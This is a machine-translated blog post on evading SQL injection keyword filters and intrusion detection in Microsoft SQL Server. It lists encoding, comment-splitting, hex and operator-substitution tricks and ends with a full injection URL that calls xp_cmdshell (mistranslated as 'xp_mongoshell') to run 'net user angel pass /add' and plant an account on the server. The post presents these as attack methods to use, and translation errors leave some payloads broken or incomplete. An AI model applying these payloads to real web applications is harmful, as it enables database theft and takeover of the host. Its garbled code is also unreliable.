Generally, the following keywords are used to filter strings:
And | select | update | chr | delete | % 20 from |; | insert | mid | master. | set | =
The most difficult thing to handle here is the select keyword. How can we break through them? Although the problem has not been completely solved, I 'd like to share it with you.
For keyword filtering, the following are my collected and my personal ideas.
1. Use the encoding technology to bypass
Such as URLEncode and ASCII code bypass. For example, if or 1 = 1, % 6f % 72% 20% 31% 3d % 31, and Test can also be CHAR (101) + CHAR (97) + CHAR (115) + CHAR (116 ).
2. Bypass with spaces
For example, if two spaces are used to replace one space, and tabs are used to replace spaces, or all spaces, such as 'sword' = 'sword', due to the loose nature of mssql, we can remove spaces between or words without affecting the operation.
3. Use string judgment instead
Use the classic or 1 = 1 to determine the bypass, for example, or 'sword' = 'sword'. This method is discussed online.
4. Bypass by type conversion modifier N
It can be said that this is a good idea. In addition to bypassing the restrictions to some extent, it also has other functions. Let's think about it. For exploitation, for example, or 'sword' = n' sword', capital N tells mssql server that the string is of the nvarchar type and plays a type conversion function without affecting the injection statement itself, however, the knowledge-based pattern matching IDS can be avoided.
5. disassemble the string by the plus sign to bypass
The results are worthy of research, but after all, they are a method. For example, or 'sword' = 'sw '+ 'ords'; EXEC ('in' + 'sert into' + '..... ')
6. bypass through LIKE
Why didn't you think of it before? For example, or 'sword' LIKE 'sw '!!! Obviously, you can easily bypass the "=" ">" restriction ......
7. bypass through IN
Similar to the above LIKE idea, for example, or 'sword' IN ('sword ')
8. bypass through
For example, or 'sword' BETWEEN 'rw 'AND 'tw'
9. Pass> or <Bypass
Or 'sword'> 'sw'
Or 'sword' <'tw'
Or 1 <3
......
10. Use the comment statement to bypass
Use/**/instead of space, such as UNION/**/Select/**/user, pwd, from tbluser
Use/**/to separate sensitive words, such as: U/**/NION/**/SE/**/LECT/**/user, pwd from tbluser
11. Bypass with HEX. Generally, IDS cannot be detected.
0x730079007300610064006D0069006E00 = hex (sysadmin)
0x640062005F006F0077006E0065007200 = hex (db_owner)
In addition, we can consider using the value Assignment Method for the filtering method of common points. For example, we can declare a variable a first, and then assign the value of our command to, then, call variable a to execute the input command. Variable a can be any command. As follows:
Declare @ a sysname
Select @ a =
Exec master. dbo. xp_mongoshell @
Effect:
Http://www.bkjia.com/show. asp? Id = 1; declare % 20 @ a % 20 sysname % 20 select % 20 @ a = running % 20 exec % 20master. dbo. xp_mongoshell % 20 @ ;--
The signature indicates "net user angel pass/add.
This breaks through a single file such as NoSqlHack. However, I think the most important thing is to consider server security, configuration security, and sound firewall and anti-virus software.
From: CmdH4ck 'bl0g
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
